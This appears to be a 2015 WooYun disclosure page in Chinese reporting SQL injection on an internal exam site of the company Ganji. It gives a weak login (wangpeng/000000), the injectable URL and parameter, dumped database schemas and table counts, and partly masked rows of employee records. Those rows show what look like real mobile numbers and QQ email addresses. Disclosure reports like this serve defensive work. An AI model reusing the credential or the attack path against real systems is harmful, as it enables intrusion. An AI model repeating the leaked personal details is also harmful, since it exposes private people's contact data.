当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140784

漏洞标题:赶集网某分站SQL注入(敏感信息泄漏)

相关厂商:赶集网

漏洞作者: DloveJ

提交时间:2015-09-12 23:21

修复时间:2015-10-28 14:06

公开时间:2015-10-28 14:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-12: 细节已通知厂商并且等待厂商处理中
2015-09-13: 厂商已经确认,细节仅向厂商公开
2015-09-23: 细节向核心白帽子及相关领域专家公开
2015-10-03: 细节向普通白帽子公开
2015-10-13: 细节向实习白帽子公开
2015-10-28: 细节向公众公开

简要描述:

楼主继续发吧。 security@ganji.com 发乌云我们是申请不下来奖品的

详细说明:

http://kaoshi.corp.ganji.com
mask 区域
*****rai*****


爆破,弱口令一枚
wangpeng/000000

1.png


登进去之后注入

http://kaoshi.corp.ganji.com
mask 区域
*****rai*****

ExamPage/ViewPaper.aspx?Clerk_kscj_ID=dd2bdf0c-e1ec-4e20-a973-d29733e87741


2.png


3.png


Database: WebExamGJW
Table: StudentInfo
[38 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| ActualName | varchar |
| Address | varchar |
| Birthday | datetime |
| Code | varchar |
| CreatedTime | datetime |
| Degree | smallint |
| Department | varchar |
| Duty | varchar |
| EMail | varchar |
| Id | varchar |
| Integral | int |
| JoinTime | datetime |
| ManagerId | varchar |
| Mobile | varchar |
| Name | varchar |
| OtherC1 | varchar |
| OtherC2 | varchar |
| OtherC3 | varchar |
| OtherC4 | varchar |
| OtherC5 | varchar |
| OtherC6 | varchar |
| OtherC7 | varchar |
| OtherC8 | varchar |
| OtherC9 | varchar |
| OtherD1 | datetime |
| OtherD2 | datetime |
| OtherI1 | int |
| OtherI2 | int |
| OtherI3 | int |
| OtherI4 | int |
| Password | varchar |
| Post | varchar |
| SerialNO | bigint |
| Sex | int |
| Status | smallint |
| Tel | varchar |
| UserId | varchar |
| WorkType | varchar |
+-------------+----------+


Database: WebExamGJW
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| dbo.ExamAnswerInfo | 63141 |
| dbo.LogInfo | 20480 |
| dbo.ExamTemp | 8663 |
| dbo.LoginInfo | 7878 |
| dbo.StudentPointLog | 7001 |
| dbo.Clerk_Cl | 4631 |
| dbo.Clerk_Cl | 4631 |
| dbo.clerk_kscj | 4002 |
| dbo.vwLoginSumInfo | 3823 |
| dbo.StudentInfo | 2342 |
| dbo.V_Clerk_Kscj_Cj | 2245 |
| dbo.V_Clerk_Kscj_Cj | 2245 |
| dbo.ExamStart | 2118 |
| dbo.SuitDetailInfo | 2020 |
| dbo.vwPassScore | 1677 |
| dbo.tk001 | 1435 |
| dbo.vwStudentSysAccessInfo | 235 |
| dbo.tk_cl_ndzsd | 125 |
| dbo.tk_cl_ndzsd | 125 |
| dbo.ExamApply | 107 |
| dbo.tk_cl_tx | 75 |
| dbo.Department | 74 |
| dbo.SysAccessAssignInfo | 68 |
| dbo.UserOptionInfo | 63 |
| dbo.tk_lx | 58 |
| dbo.PaperSuitInfo | 57 |
| dbo.StudentRoleInfo | 39 |
| dbo.SysAccessInfo | 39 |
| dbo.SysMessageInfo | 30 |
| dbo.tk_tkj | 20 |
| dbo.TkCategoryInfo | 11 |
| dbo.RoleInfo | 9 |
| dbo.SysMenuInfo | 8 |
| dbo.Tm_tx | 7 |
| dbo.UserInfo | 4 |
+----------------------------+---------+


mask 区域
*****me	Address	JoinTime	Name	Othe*****
*****11 2015 3:36PM <blank> 09 11 2015 3:36PM 1691219373@qq.co*****
*****9 11 2015 11:01AM 13559790052 09 11 2015 12:00AM 1119875919@qq.c*****
***** 2015 11:01AM 18106302449 09 11 2015 11:01AM 1178511341@qq.com *****
*****1 2015 11:01AM 13829150045 09 11 2015 11:01AM 1351179845@qq.com *****
*****2015 11:47AM 13589032788 09 11 2015 11:47AM 981008014@qq.com &*****
*****9 11 2015 5:13PM <blank> 09 11 2015 12:00A*****
*****2015 11:01AM <blank> 09 11 2015 11:01AM 752326398@qq.com*****
*****11 2015 11:33AM 13966685550 09 11 2015 11:33AM 18968257@qq.com*****
*****武 09 11 2015 11:01AM 18626891020 09 11 2015 11:01AM 2818280559@q*****
*****1 2015 11:01AM 15960278967 09 11 2015 11:01AM 2753492529@qq.com *****
***** 2015 11:47AM 18834816376 09 11 2015 11:47AM 2923865704@qq.com *****
*****2015 11:47AM 15104489228 09 11 2015 11:47AM 563923323@qq.com &*****
***** 2015 11:01AM 15088661347 09 11 2015 11:01AM liuxiaoni@qq.com &*****
***** 11 2015 11:01AM 入职超3个月 09 11 2015 11:01AM 1465049936@qq*****
***** 11 2015 11:47AM 15254248881 09 11 2015 12:00AM yangjinlong@qdganj*****
*****2015 12:01PM 13297093223 09 11 2015 12:01PM 502071733@qq.com &*****


一部分

漏洞证明:

修复方案:

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-13 14:05

厂商回复:

感谢提交,
但是,http:///vul/info/qid/QTVA-2015-
这个也是你提交的吧!一模一样的

最新状态:

暂无